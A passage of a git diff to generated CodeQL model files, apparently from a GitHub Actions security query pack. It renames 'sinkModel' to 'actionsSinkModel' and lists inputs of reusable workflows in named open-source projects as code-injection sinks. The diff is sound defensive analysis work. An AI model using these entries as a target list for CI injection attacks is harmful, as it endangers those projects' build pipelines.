"input.bazelBuildArgs", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/huggingface_doc-builder.model.yml b/ql/lib/ext/generated/reusable-workflows/huggingface_doc-builder.model.yml index 3621105b74e..7ae494adb2b 100644 --- a/ql/lib/ext/generated/reusable-workflows/huggingface_doc-builder.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/huggingface_doc-builder.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["huggingface/doc-builder/.github/workflows/upload_pr_documentation.yml", "*", "input.package_name", "code-injection", "generated"] - ["huggingface/doc-builder/.github/workflows/upload_pr_documentation.yml", "*", "input.repo_owner", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/huggingface_transformers.model.yml b/ql/lib/ext/generated/reusable-workflows/huggingface_transformers.model.yml index b6660df1c9b..dce969719d2 100644 --- a/ql/lib/ext/generated/reusable-workflows/huggingface_transformers.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/huggingface_transformers.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["huggingface/transformers/.github/workflows/slack-report.yml", "*", "input.folder_slices", "code-injection", "generated"] - ["huggingface/transformers/.github/workflows/slack-report.yml", "*", "input.setup_status", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/hyperion-project_hyperion.ng.model.yml b/ql/lib/ext/generated/reusable-workflows/hyperion-project_hyperion.ng.model.yml index ead0bcfab16..cd5d5ff7d0f 100644 --- a/ql/lib/ext/generated/reusable-workflows/hyperion-project_hyperion.ng.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/hyperion-project_hyperion.ng.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["hyperion-project/hyperion.ng/.github/workflows/qt5_6.yml", "*", "input.pull_request_number", "code-injection", "generated"] - ["hyperion-project/hyperion.ng/.github/workflows/qt5_6.yml", "*", "input.qt_version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/ibm_sarama.model.yml b/ql/lib/ext/generated/reusable-workflows/ibm_sarama.model.yml index 6f9a12e9069..fd17e601d80 100644 --- a/ql/lib/ext/generated/reusable-workflows/ibm_sarama.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/ibm_sarama.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["ibm/sarama/.github/workflows/fvt.yml", "*", "input.kafka-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/icloud-photos-downloader_icloud_photos_downloader.model.yml b/ql/lib/ext/generated/reusable-workflows/icloud-photos-downloader_icloud_photos_downloader.model.yml index 8ac32e4a7b7..bed40dce429 100644 --- a/ql/lib/ext/generated/reusable-workflows/icloud-photos-downloader_icloud_photos_downloader.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/icloud-photos-downloader_icloud_photos_downloader.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["icloud-photos-downloader/icloud_photos_downloader/.github/workflows/build-package.yml", "*", "input.icloudpd_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/immich-app_immich.model.yml b/ql/lib/ext/generated/reusable-workflows/immich-app_immich.model.yml index 3c21fcad386..62a12e47138 100644 --- a/ql/lib/ext/generated/reusable-workflows/immich-app_immich.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/immich-app_immich.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["immich-app/immich/.github/workflows/build-mobile.yml", "*", "input.ref", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/inria_spoon.model.yml b/ql/lib/ext/generated/reusable-workflows/inria_spoon.model.yml index e0d2508932f..7491c4f951a 100644 --- a/ql/lib/ext/generated/reusable-workflows/inria_spoon.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/inria_spoon.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["inria/spoon/.github/workflows/jreleaser.yml", "*", "input.release-script-to-run", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/intel_intel-device-plugins-for-kubernetes.model.yml b/ql/lib/ext/generated/reusable-workflows/intel_intel-device-plugins-for-kubernetes.model.yml index 96830183506..1876f1146cb 100644 --- a/ql/lib/ext/generated/reusable-workflows/intel_intel-device-plugins-for-kubernetes.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/intel_intel-device-plugins-for-kubernetes.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["intel/intel-device-plugins-for-kubernetes/.github/workflows/lib-publish.yaml", "*", "input.image_tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/inverse-inc_packetfence.model.yml b/ql/lib/ext/generated/reusable-workflows/inverse-inc_packetfence.model.yml index 7f9299eb4d3..4a8534429f9 100644 --- a/ql/lib/ext/generated/reusable-workflows/inverse-inc_packetfence.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/inverse-inc_packetfence.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["inverse-inc/packetfence/.github/workflows/reusable_upload_packages.yml", "*", "input._PACKAGE_NAME", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/ispc_ispc.model.yml b/ql/lib/ext/generated/reusable-workflows/ispc_ispc.model.yml index 7a79d4c1e09..ecac3f22f85 100644 --- a/ql/lib/ext/generated/reusable-workflows/ispc_ispc.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/ispc_ispc.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["ispc/ispc/.github/workflows/reusable.rebuild.yml", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/jetbrains_intellij-platform-gradle-plugin.model.yml b/ql/lib/ext/generated/reusable-workflows/jetbrains_intellij-platform-gradle-plugin.model.yml index 55888f48551..ffc4193edbf 100644 --- a/ql/lib/ext/generated/reusable-workflows/jetbrains_intellij-platform-gradle-plugin.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/jetbrains_intellij-platform-gradle-plugin.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["jetbrains/intellij-platform-gradle-plugin/.github/workflows/reusable-single-unitTest.yml", "*", "input.gradleVersion", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/jupyter_docker-stacks.model.yml b/ql/lib/ext/generated/reusable-workflows/jupyter_docker-stacks.model.yml index ea453ec4811..93b29308ff2 100644 --- a/ql/lib/ext/generated/reusable-workflows/jupyter_docker-stacks.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/jupyter_docker-stacks.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["jupyter/docker-stacks/.github/workflows/docker-tag-push.yml", "*", "input.image", "code-injection", "generated"] - ["jupyter/docker-stacks/.github/workflows/docker-tag-push.yml", "*", "input.variant", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/kairos-io_kairos.model.yml b/ql/lib/ext/generated/reusable-workflows/kairos-io_kairos.model.yml index 39005b693e7..c5965c5d8ef 100644 --- a/ql/lib/ext/generated/reusable-workflows/kairos-io_kairos.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/kairos-io_kairos.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["kairos-io/kairos/.github/workflows/reusable-zfs-test.yaml", "*", "input.flavor", "code-injection", "generated"] - ["kairos-io/kairos/.github/workflows/reusable-upgrade-with-cli-test.yaml", "*", "input.flavor_release", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/kanidm_kanidm.model.yml b/ql/lib/ext/generated/reusable-workflows/kanidm_kanidm.model.yml index 4b485083191..1fc5159e55a 100644 --- a/ql/lib/ext/generated/reusable-workflows/kanidm_kanidm.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/kanidm_kanidm.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["kanidm/kanidm/.github/workflows/kanidm_individual_book.yml", "*", "input.tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/kata-containers_kata-containers.model.yml b/ql/lib/ext/generated/reusable-workflows/kata-containers_kata-containers.model.yml index f45709cfa0f..bce14a98edd 100644 --- a/ql/lib/ext/generated/reusable-workflows/kata-containers_kata-containers.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/kata-containers_kata-containers.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["kata-containers/kata-containers/.github/workflows/release-s390x.yaml", "*", "input.target-arch", "code-injection", "generated"] - ["kata-containers/kata-containers/.github/workflows/release-ppc64le.yaml", "*", "input.target-arch", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/kiali_kiali.model.yml b/ql/lib/ext/generated/reusable-workflows/kiali_kiali.model.yml index 1d8dc84c2f0..0439d6e1d4c 100644 --- a/ql/lib/ext/generated/reusable-workflows/kiali_kiali.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/kiali_kiali.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["kiali/kiali/.github/workflows/test-images-creator.yml", "*", "input.build_mode", "code-injection", "generated"] - ["kiali/kiali/.github/workflows/test-images-creator.yml", "*", "input.release_branch", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/kotest_kotest.model.yml b/ql/lib/ext/generated/reusable-workflows/kotest_kotest.model.yml index f404aa73762..357e11b3c0b 100644 --- a/ql/lib/ext/generated/reusable-workflows/kotest_kotest.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/kotest_kotest.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["kotest/kotest/.github/workflows/run-gradle.yml", "*", "input.task", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/kubernetes_ingress-nginx.model.yml b/ql/lib/ext/generated/reusable-workflows/kubernetes_ingress-nginx.model.yml index 2f546ce3f57..4d3ea1e9156 100644 --- a/ql/lib/ext/generated/reusable-workflows/kubernetes_ingress-nginx.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/kubernetes_ingress-nginx.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["kubernetes/ingress-nginx/.github/workflows/zz-tmpl-k8s-e2e.yaml", "*", "input.k8s-version", "code-injection", "generated"] - ["kubernetes/ingress-nginx/.github/workflows/zz-tmpl-images.yaml", "*", "input.name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/kubescape_kubescape.model.yml b/ql/lib/ext/generated/reusable-workflows/kubescape_kubescape.model.yml index 9e8b1e43993..44b905cab67 100644 --- a/ql/lib/ext/generated/reusable-workflows/kubescape_kubescape.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/kubescape_kubescape.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["kubescape/kubescape/.github/workflows/d-publish-image.yaml", "*", "input.image_tag", "code-injection", "generated"] - ["kubescape/kubescape/.github/workflows/d-publish-image.yaml", "*", "input.image_name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/kubeshop_botkube.model.yml b/ql/lib/ext/generated/reusable-workflows/kubeshop_botkube.model.yml index 20a24a4ec7f..192d975ea57 100644 --- a/ql/lib/ext/generated/reusable-workflows/kubeshop_botkube.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/kubeshop_botkube.model.yml @@ -1,12 +1,12 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["kubeshop/botkube/.github/workflows/process-chart.yml", "*", "input.next-version", "code-injection", "generated"] - ["kubeshop/botkube/.github/workflows/process-chart.yml", "*", "input.release-branch", "code-injection", "generated"] - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["kubeshop/botkube/.github/workflows/process-chart.yml", "*", "input.next-version", "output.new-version", "taint", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/kumahq_kuma.model.yml b/ql/lib/ext/generated/reusable-workflows/kumahq_kuma.model.yml index 666a86caf88..627fca5d3ff 100644 --- a/ql/lib/ext/generated/reusable-workflows/kumahq_kuma.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/kumahq_kuma.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["kumahq/kuma/.github/workflows/_build_publish.yaml", "*", "input.VERSION_NAME", "code-injection", "generated"] - ["kumahq/kuma/.github/workflows/_build_publish.yaml", "*", "input.REGISTRY", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/labring_sealos.model.yml b/ql/lib/ext/generated/reusable-workflows/labring_sealos.model.yml index d4926952f1a..4d4fd0f229e 100644 --- a/ql/lib/ext/generated/reusable-workflows/labring_sealos.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/labring_sealos.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["labring/sealos/.github/workflows/services.yml", "*", "input.push_image_tag", "code-injection", "generated"] - ["labring/sealos/.github/workflows/services.yml", "*", "input.push_image", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/laion-ai_open-assistant.model.yml b/ql/lib/ext/generated/reusable-workflows/laion-ai_open-assistant.model.yml index 144c16ff8de..1ceacd2f1c0 100644 --- a/ql/lib/ext/generated/reusable-workflows/laion-ai_open-assistant.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/laion-ai_open-assistant.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["laion-ai/open-assistant/.github/workflows/docker-build.yaml", "*", "input.context", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/learningequality_kolibri.model.yml b/ql/lib/ext/generated/reusable-workflows/learningequality_kolibri.model.yml index f97ee81bcb9..ba0f5c06a67 100644 --- a/ql/lib/ext/generated/reusable-workflows/learningequality_kolibri.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/learningequality_kolibri.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["learningequality/kolibri/.github/workflows/upload_github_release_asset.yml", "*", "input.release_id", "code-injection", "generated"] - ["learningequality/kolibri/.github/workflows/upload_github_release_asset.yml", "*", "input.filename", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/lensesio_stream-reactor.model.yml b/ql/lib/ext/generated/reusable-workflows/lensesio_stream-reactor.model.yml index 401875059ec..3c8f11dd0cd 100644 --- a/ql/lib/ext/generated/reusable-workflows/lensesio_stream-reactor.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/lensesio_stream-reactor.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["lensesio/stream-reactor/.github/workflows/build.yml", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/leptos-rs_leptos.model.yml b/ql/lib/ext/generated/reusable-workflows/leptos-rs_leptos.model.yml index 6d6f9e17740..b7c00fff318 100644 --- a/ql/lib/ext/generated/reusable-workflows/leptos-rs_leptos.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/leptos-rs_leptos.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["leptos-rs/leptos/.github/workflows/run-cargo-make-task.yml", "*", "input.directory", "code-injection", "generated"] - ["leptos-rs/leptos/.github/workflows/run-cargo-make-task.yml", "*", "input.cargo_make_task", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/lightning-ai_pytorch-lightning.model.yml b/ql/lib/ext/generated/reusable-workflows/lightning-ai_pytorch-lightning.model.yml index a4b2b55262f..5a129691bc5 100644 --- a/ql/lib/ext/generated/reusable-workflows/lightning-ai_pytorch-lightning.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/lightning-ai_pytorch-lightning.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["lightning-ai/pytorch-lightning/.github/workflows/_legacy-checkpoints.yml", "*", "input.push_to_s3", "code-injection", "generated"] - ["lightning-ai/pytorch-lightning/.github/workflows/_legacy-checkpoints.yml", "*", "input.pl_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/liquibase_liquibase.model.yml b/ql/lib/ext/generated/reusable-workflows/liquibase_liquibase.model.yml index dd3bfe71b7b..bd07156d06b 100644 --- a/ql/lib/ext/generated/reusable-workflows/liquibase_liquibase.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/liquibase_liquibase.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["liquibase/liquibase/.github/workflows/build-azure-uber-jar.yml", "*", "input.liquibase-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/litestar-org_litestar.model.yml b/ql/lib/ext/generated/reusable-workflows/litestar-org_litestar.model.yml index 2207feeec22..b029e341710 100644 --- a/ql/lib/ext/generated/reusable-workflows/litestar-org_litestar.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/litestar-org_litestar.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["litestar-org/litestar/.github/workflows/test.yml", "*", "input.python-version", "code-injection", "generated"] - ["litestar-org/litestar/.github/workflows/notify-released-issues.yml", "*", "input.release_tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/llvm_circt.model.yml b/ql/lib/ext/generated/reusable-workflows/llvm_circt.model.yml index 2128369a7a9..995e692e494 100644 --- a/ql/lib/ext/generated/reusable-workflows/llvm_circt.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/llvm_circt.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["llvm/circt/.github/workflows/unifiedBuildTestAndInstall.yml", "*", "input.package_name_prefix", "code-injection", "generated"] - ["llvm/circt/.github/workflows/unifiedBuildTestAndInstall.yml", "*", "input.install", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/lnbits_lnbits.model.yml b/ql/lib/ext/generated/reusable-workflows/lnbits_lnbits.model.yml index 57791c68c0a..db325a06baa 100644 --- a/ql/lib/ext/generated/reusable-workflows/lnbits_lnbits.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/lnbits_lnbits.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["lnbits/lnbits/.github/workflows/make.yml", "*", "input.make", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/lutris_lutris.model.yml b/ql/lib/ext/generated/reusable-workflows/lutris_lutris.model.yml index 2a65a351255..2c91ab62b0c 100644 --- a/ql/lib/ext/generated/reusable-workflows/lutris_lutris.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/lutris_lutris.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["lutris/lutris/.github/workflows/publish-ppa.yml", "*", "input.PPA_URI", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/mailu_mailu.model.yml b/ql/lib/ext/generated/reusable-workflows/mailu_mailu.model.yml index 53f6f6da728..8fdf39a0bbc 100644 --- a/ql/lib/ext/generated/reusable-workflows/mailu_mailu.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/mailu_mailu.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["mailu/mailu/.github/workflows/build_test_deploy.yml", "*", "input.pinned_mailu_version", "code-injection", "generated"] - ["mailu/mailu/.github/workflows/build_test_deploy.yml", "*", "input.mailu_version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/mamba-org_mamba.model.yml b/ql/lib/ext/generated/reusable-workflows/mamba-org_mamba.model.yml index 8ef924313a9..00fceb9c7bd 100644 --- a/ql/lib/ext/generated/reusable-workflows/mamba-org_mamba.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/mamba-org_mamba.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["mamba-org/mamba/.github/workflows/windows_impl.yml", "*", "input.build_type", "code-injection", "generated"] - ["mamba-org/mamba/.github/workflows/unix_impl.yml", "*", "input.build_type", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/manticoresoftware_manticoresearch.model.yml b/ql/lib/ext/generated/reusable-workflows/manticoresoftware_manticoresearch.model.yml index 800c95ac1bf..a6b947dfbce 100644 --- a/ql/lib/ext/generated/reusable-workflows/manticoresoftware_manticoresearch.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/manticoresoftware_manticoresearch.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["manticoresoftware/manticoresearch/.github/workflows/win_test_template.yml", "*", "input.CTEST_END", "code-injection", "generated"] - ["manticoresoftware/manticoresearch/.github/workflows/win_test_template.yml", "*", "input.CTEST_START", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/marcelotduarte_cx_freeze.model.yml b/ql/lib/ext/generated/reusable-workflows/marcelotduarte_cx_freeze.model.yml index 7a73bee6e57..9359ea482c0 100644 --- a/ql/lib/ext/generated/reusable-workflows/marcelotduarte_cx_freeze.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/marcelotduarte_cx_freeze.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["marcelotduarte/cx_freeze/.github/workflows/build-wheel.yml", "*", "input.branch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/materialdesigninxaml_materialdesigninxamltoolkit.model.yml b/ql/lib/ext/generated/reusable-workflows/materialdesigninxaml_materialdesigninxamltoolkit.model.yml index 08d64944bd9..023666e67ff 100644 --- a/ql/lib/ext/generated/reusable-workflows/materialdesigninxaml_materialdesigninxamltoolkit.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/materialdesigninxaml_materialdesigninxamltoolkit.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["materialdesigninxaml/materialdesigninxamltoolkit/.github/workflows/build_artifacts.yml", "*", "input.mdix-mahapps-version", "code-injection", "generated"] - ["materialdesigninxaml/materialdesigninxamltoolkit/.github/workflows/build_artifacts.yml", "*", "input.mdix-colors-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/matter-labs_zksync-era.model.yml b/ql/lib/ext/generated/reusable-workflows/matter-labs_zksync-era.model.yml index d1097c47aeb..7005b7dd7c9 100644 --- a/ql/lib/ext/generated/reusable-workflows/matter-labs_zksync-era.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/matter-labs_zksync-era.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["matter-labs/zksync-era/.github/workflows/ci-core-reusable.yml", "*", "input.compilers", "code-injection", "generated"] - ["matter-labs/zksync-era/.github/workflows/build-prover-template.yml", "*", "input.image_tag_suffix", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/mattermost_desktop.model.yml b/ql/lib/ext/generated/reusable-workflows/mattermost_desktop.model.yml index 8d7fb64ad3a..8b73f89401a 100644 --- a/ql/lib/ext/generated/reusable-workflows/mattermost_desktop.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/mattermost_desktop.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["mattermost/desktop/.github/workflows/e2e-functional-template.yml", "*", "input.nightly", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/mattermost_mattermost.model.yml b/ql/lib/ext/generated/reusable-workflows/mattermost_mattermost.model.yml index d7790e533c9..3cf43b814db 100644 --- a/ql/lib/ext/generated/reusable-workflows/mattermost_mattermost.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/mattermost_mattermost.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["mattermost/mattermost/.github/workflows/server-test-template.yml", "*", "input.name", "code-injection", "generated"] - ["mattermost/mattermost/.github/workflows/server-test-template.yml", "*", "input.drivername", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/mealie-recipes_mealie.model.yml b/ql/lib/ext/generated/reusable-workflows/mealie-recipes_mealie.model.yml index 093ed8bcfd1..d33e308c7eb 100644 --- a/ql/lib/ext/generated/reusable-workflows/mealie-recipes_mealie.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/mealie-recipes_mealie.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["mealie-recipes/mealie/.github/workflows/partial-builder.yml", "*", "input.tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/meshery_meshery.model.yml b/ql/lib/ext/generated/reusable-workflows/meshery_meshery.model.yml index 0ce99bc5fa9..5c1de93f08a 100644 --- a/ql/lib/ext/generated/reusable-workflows/meshery_meshery.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/meshery_meshery.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["meshery/meshery/.github/workflows/test_adaptersv2.yaml", "*", "input.adapter_version", "code-injection", "generated"] - ["meshery/meshery/.github/workflows/test_adaptersv2.yaml", "*", "input.sm_version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/meshtastic_firmware.model.yml b/ql/lib/ext/generated/reusable-workflows/meshtastic_firmware.model.yml index 2767dfbec76..aab9fa502cb 100644 --- a/ql/lib/ext/generated/reusable-workflows/meshtastic_firmware.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/meshtastic_firmware.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["meshtastic/firmware/.github/workflows/build_rpi2040.yml", "*", "input.board", "code-injection", "generated"] - ["meshtastic/firmware/.github/workflows/build_nrf52.yml", "*", "input.board", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/microcks_microcks.model.yml b/ql/lib/ext/generated/reusable-workflows/microcks_microcks.model.yml index 2c5679329c1..b58fff831e1 100644 --- a/ql/lib/ext/generated/reusable-workflows/microcks_microcks.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/microcks_microcks.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["microcks/microcks/.github/workflows/package-native.yml", "*", "input.image-tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/microsoft_applicationinsights-java.model.yml 